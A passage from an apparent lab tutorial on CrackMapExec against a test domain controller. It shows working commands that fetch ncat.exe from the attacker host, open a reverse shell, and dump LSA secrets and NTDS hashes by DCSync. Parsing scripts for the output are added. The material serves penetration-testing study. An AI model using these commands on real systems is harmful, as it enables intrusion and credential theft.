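        findings.append(("lockout_threshold",
                         "lockout threshold 0: failed logons never lock an account, so guessing is unthrottled"))
    elif policy["lockout_threshold"] > baseline["lockout_threshold_max"]:
        findings.append(("lockout_threshold",
                         f"lockout threshold {policy['lockout_threshold']} exceeds {baseline['lockout_threshold_max']}"))
    elif (policy["lockout_duration_minutes"] or 0) < baseline["lockout_duration_min"]:
        findings.append(("lockout_duration",
                         f"lockout duration is below {baseline['lockout_duration_min']} minutes"))
    return findings


if __name__ == "__main__":
    policy = parse_password_policy(PASS_POL_SAMPLE)
    for field, message in evaluate_policy(policy):
        print(f"{field}: {message}")
```

Against the post's domain this reports two findings, the short minimum length and the missing lockout; the lockout duration is not reported separately because it is irrelevant while the threshold is 0.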

Let's do our final enumeration, listing the users currently logged on to the host at "10.0.0.105:445 SECNIK-2K19", which is reporting as a domain controller.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lusers
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Enumerating logged on users
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\Administrator LogonServer: SECNIK-2K19
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 
CME          10.0.0.105:445 SECNIK-2K19     Username: SECURITYNIK\SECNIK-2K19$ 

From above we can conclude that the user "Administrator" is currently logged on. The account "SECNIK-2K19$" represents the computer account; note the "$" at the end.

Now that we have enumerated the various information from the hosts, let's now stick with the domain controller.

Let's run a PowerShell command to get the list of processes running on the host.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X get-process
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command 
CME          10.0.0.105:445 SECNIK-2K19     #< CLIXML
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
CME          10.0.0.105:445 SECNIK-2K19     -------  ------    -----      -----     ------     --  -- -----------
CME          10.0.0.105:445 SECNIK-2K19     84       6     2824        992       0.17    840   1 cmd
CME          10.0.0.105:445 SECNIK-2K19     76       5     3280       3708       0.02   4696   0 cmd
CME          10.0.0.105:445 SECNIK-2K19     251      13     8036       1212       3.34   4088   1 conhost
CME          10.0.0.105:445 SECNIK-2K19     147       9     7112      12512       0.05   4912   0 conhost
CME          10.0.0.105:445 SECNIK-2K19     330      13     2172       5572       0.66    352   0 csrss
CME          10.0.0.105:445 SECNIK-2K19     304      15     2204       5192       0.61    424   1 csrss
CME          10.0.0.105:445 SECNIK-2K19     395      15     5472      17024       0.78   3024   1 ctfmon
CME          10.0.0.105:445 SECNIK-2K19     381      32    16200      21988       5.03   1996   0 dfsrs
CME          10.0.0.105:445 SECNIK-2K19     191      13     2584       7700       0.03   1160   0 dfssvc
CME          10.0.0.105:445 SECNIK-2K19     215      16     3288      11392       0.06   2416   1 dllhost
CME          10.0.0.105:445 SECNIK-2K19     10366    7411   129432     128224       2.23   3472   0 dns
CME          10.0.0.105:445 SECNIK-2K19     647      48    67024     123304      30.19    856   1 dwm
CME          10.0.0.105:445 SECNIK-2K19     1805      78    63140      11888      21.97   3000   1 explorer
....
CME          10.0.0.105:445 SECNIK-2K19     54       4      728       3156       0.03   1676   0 wlms
CME          10.0.0.105:445 SECNIK-2K19     369      20    11468      22504       0.70    168   0 WmiPrvSE
CME          10.0.0.105:445 SECNIK-2K19     351      13     6056      13148       0.67   4304   0 WmiPrvSE
CME          10.0.0.105:445 SECNIK-2K19     174      11     2872       9004       0.05   4520   0 WmiPrvSE
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
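The "#< CLIXML" marker and the "<Objs ...>" blob at the end are PowerShell's serialized stream output (here a single progress record, "Preparing modules for first use."), which CME passes through verbatim. When reviewing such output, for instance in an assessment report, it helps to separate the real command output from that wrapper. The following is an added example, not code from the post or from CrackMapExec: it strips the CME prefix, pulls the progress message out of the CLIXML with the standard library XML parser, and parses the default Get-Process table into records. The sample is a constructed, trimmed copy of the output above plus a constructed "Idle" row with a blank CPU column, which is the edge case the table parser handles.

```python
import re
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"  # CLIXML namespace
CME_PREFIX_RE = re.compile(r"^CME\s+\S+:\d+\s+\S+\s*(?P<rest>.*)$")
CME_STATUS_RE = re.compile(r"^\[[-+*!]\] ")

# Constructed sample modelled on the post's "-X get-process" run (three rows kept;
# the "Idle" row with an empty CPU(s) column is added to exercise that edge case).
X_OUTPUT_SAMPLE = """
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command
CME          10.0.0.105:445 SECNIK-2K19     #< CLIXML
CME          10.0.0.105:445 SECNIK-2K19
CME          10.0.0.105:445 SECNIK-2K19     Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
CME          10.0.0.105:445 SECNIK-2K19     -------  ------    -----      -----     ------     --  -- -----------
CME          10.0.0.105:445 SECNIK-2K19     84       6     2824        992       0.17    840   1 cmd
CME          10.0.0.105:445 SECNIK-2K19     10366    7411   129432     128224       2.23   3472   0 dns
CME          10.0.0.105:445 SECNIK-2K19     1805      78    63140      11888      21.97   3000   1 explorer
CME          10.0.0.105:445 SECNIK-2K19     0        0       60          8                    0   0 Idle
CME          10.0.0.105:445 SECNIK-2K19
CME          10.0.0.105:445 SECNIK-2K19     <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
[*] KTHXBYE!
"""


def strip_cme_prefix(text):
    """Yield the payload of every CME-prefixed line; lines without the prefix are dropped."""
    for raw in text.splitlines():
        m = CME_PREFIX_RE.match(raw.rstrip())
        if m:
            yield m["rest"]


def split_clixml(payloads):
    """Separate plain command output from serialized CLIXML: (text_lines, progress_messages)."""
    text_lines, progress = [], []
    for line in payloads:
        s = line.strip()
        if not s or CME_STATUS_RE.match(s) or s == "#< CLIXML":
            continue  # blank line, CME status line, or the CLIXML marker itself
        if s.startswith("<Objs"):
            root = ET.fromstring(s)  # progress records carry their text in <AV> elements
            progress.extend(el.text for el in root.iter(PS_NS + "AV") if el.text)
            continue
        text_lines.append(line.rstrip())
    return text_lines, progress


def parse_get_process_table(text_lines):
    """Parse the default Get-Process table; CPU is None when that column is blank."""
    rows, header = [], None
    for line in text_lines:
        cols = line.split()
        if header is None:
            if len(cols) == 8 and cols[-1] == "ProcessName":
                header = cols
            continue
        if not cols or set(line.strip()) <= {"-", " "}:
            continue  # the underline row
        if len(cols) == len(header) - 1:
            cols.insert(4, None)  # blank CPU(s): splitting on whitespace loses the empty column
        if len(cols) != len(header):
            continue  # not a table row
        rows.append({"Handles": int(cols[0]), "NPM_K": int(cols[1]), "PM_K": int(cols[2]),
                     "WS_K": int(cols[3]), "CPU": None if cols[4] is None else float(cols[4]),
                     "Id": int(cols[5]), "SI": int(cols[6]), "ProcessName": cols[7]})
    return rows


def clean_cme_ps_output(text):
    """Full pipeline for a CME -X run: text lines, progress messages and parsed process rows."""
    text_lines, progress = split_clixml(strip_cme_prefix(text))
    return {"text": text_lines, "progress": progress, "processes": parse_get_process_table(text_lines)}


if __name__ == "__main__":
    result = clean_cme_ps_output(X_OUTPUT_SAMPLE)
    print("progress records:", result["progress"])
    for proc in result["processes"]:
        print(f"{proc['Id']:>6} {proc['ProcessName']:<12} cpu={proc['CPU']}")
```

The table parser splits on whitespace, which is why a blank CPU column has to be put back by token count; a fixed-width parser keyed on the dash underline would be the alternative if you need columns that may themselves contain spaces.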

Very nice that we can use this tool to execute PowerShell commands from our Kali host. Hmmm. I wonder what else we can do. Let's see if we can get the host to download a malicious binary. We will serve it with Python's SimpleHTTPServer on port 443. Before we do that though, let's understand the directory structure of the host by executing:


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\\"  --exec-method smbexec
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command via smbexec
CME          10.0.0.105:445 SECNIK-2K19     Volume in drive C has no label.
CME          10.0.0.105:445 SECNIK-2K19     Volume Serial Number is DA96-0589
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     Directory of c:\
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     09/15/2018  12:19 AM    <DIR>          PerfLogs
CME          10.0.0.105:445 SECNIK-2K19     03/14/2019  12:37 PM    <DIR>          Program Files
CME          10.0.0.105:445 SECNIK-2K19     09/15/2018  02:08 AM    <DIR>          Program Files (x86)
CME          10.0.0.105:445 SECNIK-2K19     03/19/2019  03:41 PM    <DIR>          Tools
CME          10.0.0.105:445 SECNIK-2K19     03/03/2019  11:19 PM    <DIR>          Users
CME          10.0.0.105:445 SECNIK-2K19     03/13/2019  07:55 PM    <DIR>          Windows
CME          10.0.0.105:445 SECNIK-2K19     0 File(s)              0 bytes
CME          10.0.0.105:445 SECNIK-2K19     6 Dir(s)  31,761,924,096 bytes free
[*] KTHXBYE!


Let's now see if we can download "ncat.exe" and place it in the "Tools" folder. First we set up our web server using Python's SimpleHTTPServer on port 443.


root@securitynik:/usr/share/ncat-w32# ls
ncat.exe  README
root@securitynik:/usr/share/ncat-w32# file ncat.exe 
ncat.exe: PE32 executable (console) Intel 80386, for MS Windows
root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...

Once again we will leverage PowerShell, this time to get the host to download "ncat.exe" from our attacking machine.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -X "(New-Object System.Net.WebClient).DownloadFile('http://10.0.0.100:443/ncat.exe','c:\tools\ncat.exe')"
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command 
CME          10.0.0.105:445 SECNIK-2K19     #< CLIXML
CME          10.0.0.105:445 SECNIK-2K19     <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>


To verify that "ncat.exe" has been downloaded successfully, let's browse the tools directory:

root@securitynik:/# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "dir c:\tools\ncat.exe" --exec-method smbexec
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Executed command via smbexec
CME          10.0.0.105:445 SECNIK-2K19     Volume in drive C has no label.
CME          10.0.0.105:445 SECNIK-2K19     Volume Serial Number is DA96-0589
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     Directory of c:\tools
CME          10.0.0.105:445 SECNIK-2K19     
CME          10.0.0.105:445 SECNIK-2K19     04/03/2019  07:29 PM         1,667,584 ncat.exe
CME          10.0.0.105:445 SECNIK-2K19     1 File(s)      1,667,584 bytes
CME          10.0.0.105:445 SECNIK-2K19     0 Dir(s)  31,757,164,544 bytes free
[*] KTHXBYE!

We can also confirm the file was downloaded by looking at the output from Python's SimpleHTTPServer.


root@securitynik:/usr/share/ncat-w32# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
10.0.0.100 - - [03/Apr/2019 22:20:47] "GET / HTTP/1.1" 200 -
10.0.0.100 - - [03/Apr/2019 22:20:47] code 404, message File not found
10.0.0.100 - - [03/Apr/2019 22:20:47] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.105 - - [03/Apr/2019 22:29:32] "GET /ncat.exe HTTP/1.1" 200 -

Nice!! Let's wrap up this "ncat.exe" portion by getting a reverse shell sent to us from the domain controller to which we just uploaded "ncat.exe". Let's first set up our listener on our Kali (attacking) machine. We will use port 443, which typically carries encrypted traffic. However, in this case we will not encrypt the traffic, as in another post we will look at the packet analysis of all this activity.

Here is our "ncat" listener on our attacking machine. As you may notice below, it is listening on both IPv4 (0.0.0.0:443) and IPv6 (:::443).


root@securitynik:/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Now let's execute "ncat.exe" on the remote domain controller via CrackMapExec:


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443" --exec-method smbexec
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
[*] KTHXBYE!

Now it's time to test if we were able to successfully execute "ncat.exe" on the remote device. If we did, we should now have a shell on our attacking machine. Let's see if we were blessed with a shell.

root@securitynik:~/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.105.
Ncat: Connection from 10.0.0.105:50602.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
securitynik\administrator

C:\>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
nakia                    neysa                    nik                      
Prague                   saadia                   securitynik              
The command completed with one or more errors.


C:\>exit

What do you know, we see above we have a shell with system level privileges. Obviously, now that we have this access we can go crazy. However, I will leave it here as I'm still trying to learn more about CrackMapExec. Considering the above, we could even have configured a scheduled task to ensure the shell is sent to us on a daily basis at a certain time.

Let's move on to something different. Let's first look at grabbing secrets held by the LSA (Local Security Authority) with --lsa. Despite the name, this does not read the memory of the lsass.exe process; it dumps the LSA secrets and cached domain logon information stored in the SECURITY registry hive. In the output below we get back the domain controller's own machine account hash (SECNIK-2K19$), the DPAPI_SYSTEM key, and NL$KM, the key used to protect cached domain credentials.

root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lsa
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping LSA Secrets
CME          10.0.0.105:445 SECNIK-2K19     SECURITYNIK\SECNIK-2K19$:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::
CME          10.0.0.105:445 SECNIK-2K19     DPAPI_SYSTEM:010000004cfe7f1570df81dc0106e97aa01a607494b3b79a2c6c1d5c51fa01f8dcfee4433a922b2cc3e661aa
CME          10.0.0.105:445 SECNIK-2K19     NL$KM:4464bf81f673d67d247f4b7154892396524ee8d8605a42bbbc54901af2b62beb606815c92c17f71ecf7fbe14a476e0d9ca3f27570a51b2a9c8457664842d9094
[*] KTHXBYE!


Let's go further with credentials and see if we can dump the NTDS database. CrackMapExec gives us two methods to achieve this: volume shadow copy (VSS) or DRSUAPI. DRSUAPI is the faster and recommended method for this tool.

Since I've used other tools such as Metasploit in my book (Learning By Practicing - Hack & Detect: Leveraging the Cyber Kill Chain for Practical Hacking and its Detection via Network Forensics) to grab credentials from AD via VSS, I will try this DRSUAPI method.

On a side note, DRSUAPI is the RPC interface that implements the Directory Replication Service (DRS) Remote Protocol (MS-DRSR). Think Active Directory with multiple domain controllers needing to replicate data so all domain controllers are in sync and up to date. Dumping via DRSUAPI works by asking the domain controller to replicate account secrets to us as if we were another domain controller. It therefore never touches NTDS.dit on disk, and it only requires an account holding the directory replication rights (a domain admin, for example). This is the same technique commonly known as DCSync.

Now that we know what DRSUAPI is, let's get back to dumping.


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --ntds drsuapi
CME          10.0.0.105:445 SECNIK-2K19     [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK)
CME          10.0.0.105:445 SECNIK-2K19     [+] SECURITYNIK\administrator:Testing1 (Pwn3d!)
CME          10.0.0.105:445 SECNIK-2K19     [+] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CME          10.0.0.105:445 SECNIK-2K19     [+] Using the DRSUAPI method to get NTDS.DIT secrets
CME          10.0.0.105:445 SECNIK-2K19     Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CME          10.0.0.105:445 SECNIK-2K19     krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c82d13d85e7f4d04b8614295063c1e28:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\nakia:1103:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\neysa:1104:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\securitynik:1105:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\saadia:1106:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     securitynik.local\nik:1107:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     Prague:1110:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026:::
CME          10.0.0.105:445 SECNIK-2K19     SECNIK-2K19$:1000:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::
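
Once we have the --lsa and --ntds output, the next practical step is triaging it: which accounts have an empty password, which still have an LM hash, and which accounts share a password (in the dump above, nakia, neysa, securitynik, saadia, nik and Prague all carry the same NT hash as Administrator, i.e. they all use the same password). The script below is an added example written for this post; it is not code from the original post or from CrackMapExec. It parses the pwdump-style lines CME prints for both --lsa (machine account without a RID) and --ntds (user:rid:lm:nt:::), picks up named LSA secrets such as DPAPI_SYSTEM, and reports the findings. The SAMPLE text is constructed to mirror CME's output format; the domain, hosts, users and hashes are made up, apart from the well-known LM/NT hash pair of the password "password" given to the account "bob".

```python
"""Triage a CrackMapExec --lsa / --ntds dump.

Added example for this post, not code from the post or from CrackMapExec.
SAMPLE below is constructed: lab.local, DC01, the users and the hashes are
invented, except bob's LM/NT pair, which is the well-known hash of "password".
"""
import re
from collections import defaultdict

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Every CME output line starts with "CME <ip>:<port> <hostname>"; what follows
# is either a status message ("[+] ...") or a secret.
CME_LINE = re.compile(r"^CME\s+(?P<host>\S+):\d+\s+(?P<name>\S+)\s+(?P<rest>.*)$")
# pwdump style user:rid:lm:nt:::  (--lsa prints the machine account without a RID)
PWDUMP = re.compile(
    r"^(?P<user>[^:]+):(?:(?P<rid>\d+):)?(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")
# LSA secrets such as DPAPI_SYSTEM and NL$KM are printed as name:hex
LSA_SECRET = re.compile(r"^(?P<secret>[A-Za-z0-9_$]+):(?P<hex>[0-9a-fA-F]+)$")

# Constructed sample in the format CME prints (not real credentials).
SAMPLE = r"""
CME          10.0.0.200:445 DC01            [+] Dumping LSA Secrets
CME          10.0.0.200:445 DC01            LAB\DC01$:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CME          10.0.0.200:445 DC01            DPAPI_SYSTEM:0100000011223344556677889900aabbccddeeff
CME          10.0.0.200:445 DC01            [+] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CME          10.0.0.200:445 DC01            [+] Using the DRSUAPI method to get NTDS.DIT secrets
CME          10.0.0.200:445 DC01            Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CME          10.0.0.200:445 DC01            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CME          10.0.0.200:445 DC01            lab.local\alice:1103:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CME          10.0.0.200:445 DC01            lab.local\bob:1104:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
CME          10.0.0.200:445 DC01            DC01$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] KTHXBYE!
"""


def parse_cme_output(text):
    """Split CME output into pwdump-style hashes and named LSA secrets."""
    hashes, lsa_secrets = [], {}
    for raw in text.splitlines():
        m = CME_LINE.match(raw.strip())
        if not m:
            continue                       # banner / KTHXBYE / anything else
        rest = m.group("rest").strip()
        p = PWDUMP.match(rest)
        if p:
            user = p.group("user").rsplit("\\", 1)[-1]   # drop "domain\" prefix
            hashes.append({
                "host": m.group("host"),
                "user": user,
                "rid": int(p.group("rid")) if p.group("rid") else None,
                "lm": p.group("lm").lower(),
                "nt": p.group("nt").lower(),
                "machine": user.endswith("$"),           # computer account
            })
            continue
        s = LSA_SECRET.match(rest)
        if s:
            lsa_secrets[s.group("secret")] = s.group("hex").lower()
    return {"hashes": hashes, "lsa_secrets": lsa_secrets}


def analyse(hashes):
    """Flag empty passwords, LM hashes, RID 500 and NT-hash reuse across users."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for h in hashes:
        if h["machine"]:
            continue   # machine-account passwords are random; reuse/LM checks don't apply
        by_nt[h["nt"]].append(h["user"])
        if h["nt"] == EMPTY_NT:
            findings["empty_password"].append(h["user"])
        if h["lm"] != BLANK_LM:
            findings["lm_hash_present"].append(h["user"])   # LM is trivially crackable
        if h["rid"] == 500:
            findings["builtin_admin"].append(h["user"])     # renamed or not, RID 500 is Administrator
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_nt_hash"].append(sorted(users))  # same password on several accounts
    return dict(findings)


def unique_nt_hashes(hashes):
    """NT hashes worth cracking: one copy each, no machine accounts, no empty password."""
    return sorted({h["nt"] for h in hashes if not h["machine"] and h["nt"] != EMPTY_NT})


if __name__ == "__main__":
    parsed = parse_cme_output(SAMPLE)
    for key, value in analyse(parsed["hashes"]).items():
        print(f"{key}: {value}")
    print("LSA secrets:", ", ".join(parsed["lsa_secrets"]))
    print("NT hashes to crack:", unique_nt_hashes(parsed["hashes"]))
```

To use it on a real run, save CME's output (for example with `| tee ntds.txt` on the --ntds command) and pass the file contents to parse_cme_output instead of SAMPLE. The shared_nt_hash finding is the one worth reading first: every account in such a group falls the moment any one of their passwords is cracked or the hash is passed, which is exactly the situation the dump above shows.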


Before we close this out, let's take a look at some of the available modules:


root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --list-modules
[*] empire_exec          Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] mimikittenz          Executes Mimikittenz
[*] rundll32_exec        Executes a command using rundll32 and Windows's native javascript interpreter
[*] shellinject          Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
[*] com_exec             Executes a command using a COM scriptlet to bypass whitelisting
[*] enum_chrome          Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords
[*] tokens               Enumerates available tokens using Powersploit's Invoke-TokenManipulation
[*] mimikatz             Executes PowerSploit's Invoke-Mimikatz.ps1 script
[*] powerview            Wrapper for PowerView's functions
[*] peinject             Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script
[*] tokenrider           Allows for automatic token enumeration, impersonation and mass lateral spread using privileges instead of dumped credentials
[*] metinject            Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
[*] eventvwr_bypass      Executes a command using the eventvwr.exe fileless UAC bypass


This post is already a bit longer than I had planned. In another post I will look into using some of the other modules.

References:
https://ptestmethod.readthedocs.io/en/latest/cme.html
https://www.securenetworkinc.com/news/2017/8/22/crackmapexec-the-greatest-tool-youve-never-heard-of
https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/
https://offensivesec.blogspot.com/2016/01/crackmapexec-swiss-army-knife-for_92.html
https://www.n00py.io/2017/10/detecting-crackmapexec-cme-with-bro-sysmon-and-powershell-logs/
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Credentials
https://nmap.org/ncat/guide/ncat-ssl.html
https://wiki.samba.org/index.php/DRSUAPI
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/58f33216-d9f1-43bf-a183-87e3c899c410
https://www.samba.org/~metze/presentations/2007/metze_sambaxp2007_drsuapi_repl.pdf
https://adsecurity.org/?p=1729
https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
https://adsecurity.org/?p=1760
https://adsecurity.org/?page_id=1821
https://alpymarinos.wordpress.com/2016/01/06/mimikatz/
https://blog.nviso.be/2018/01/09/windows-credential-guard-mimikatz/


Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis
